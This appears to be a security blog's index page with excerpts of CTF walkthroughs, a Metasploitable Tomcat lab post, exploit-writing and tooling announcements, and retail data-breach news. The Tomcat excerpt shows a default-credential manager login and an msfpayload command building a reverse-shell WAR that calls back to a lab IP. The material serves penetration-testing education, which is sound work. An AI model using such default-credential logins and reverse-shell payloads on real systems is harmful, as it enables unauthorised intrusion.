CSAW 2014 walkthrough – Fluffy No More

Fluffy No More was a Forensics 300 point challenge at CSAW 2014. The backstory seemed kind of funny and I thought I’d give it a shot!


Setup

The attached tarball contained a few additional tarballs:

  • Full /etc directory contents
  • Full /var/log directory contents
  • Full /var/www directory contents
  • A MySQL database dump file

The task was to determine the attacker’s ingress point as well as discover a key for the CTF challenge. I cover both points in the sections below.

CSAW 2014 walkthrough – pybabbies

pybabbies was an Exploitation 200 challenge during the CTF and I got “voluntold” to work on this one by my teammates since I have a strong Python background. The night was young and I felt pretty good about it, so I took a look.


Setting the scene

Connecting to that IP/port with netcat revealed a shell prompt indicating that I had connected to a Python sandbox environment. Python sandboxes are nothing new, and I had actually recently done some reading on a sandbox challenge from an older CTF writeup, so I felt pretty good about what I was getting myself into.

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Let’s start with an Nmap scan…

So we can see on port 8180 we have Tomcat running… Let’s take a look at it…

As we can see, the Tomcat manager requires a login. I know that by default the username and password are both ‘tomcat’, so let’s try that.

We have logged into the manager application! Let’s now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.28.245 LPORT=4444 W > myshell.war

Enumerator PIP install is live

Great news! After collaborating with felux (@sugarstackio) of http://sugarstack.io in #overflowsec, I’m excited that enumerator is now a pip install within Python! Woohoo!

More information can be obtained at Enumerator PIP. Give it a once over; it’s an easy install now.

Thanks, felux, for all of the hard work; the project is coming along great. Look for more updates in the future.

Simple Buffer Overflow bypassing SEH

Here recently, I have gotten more interested in exploit writing and the entire process of it. Being that I am a noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn’t able to find the “Explain like I’m 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally got it figured out, I wanted to share with the world! 😀

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot. There is no reason to believe only some stores were affected, and chances are the breach is spread across the company’s 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014. If that is the case, we need to think of the impact this could have. If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debit cards.

New Video Series

We are excited to announce we have started production on our first video series! “Metasploitable without Metasploit”. The focus of this video series is to teach the up-and-coming InfoSec student how to manually exploit Metasploitable. This is going to help you get a much better understanding as to why these exploits work, and what makes them tick.

Don’t get us wrong, we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way. This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

Shaws and Star Market Data Breach – What You Need To Know

So yes, yet again we are faced with another data breach of a major chain of retail stores. This time it is Shaws and Star Market. These companies are owned by Albertsons.

At this point the details have not been released. It would appear that the Point of Sale (POS) system was probably targeted to steal the customer information.

So what did they get? Allegedly they have Names, Expiration Dates, Card Numbers, PIN Numbers (unclear), and 3-digit security codes. Customers that shopped at Shaws and Star Market between June 22 and July 17 should keep a close eye on their bank accounts and report any discrepancies to their financial institutions.

Tr0ll

Having just finished the OSCP labs (exam is next week), I needed something to keep my mind working and do something a little fun. Naturally, I turned to Vulnhub.com to download a vulnerable VM and keep my geek appetite satisfied. Prior to starting the OSCP course, I frequented Vulnhub as a way to “prepare” me for the labs during the course. (It’s obviously a good start, but nothing can prepare you for those, just FYI.)

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members’ employers.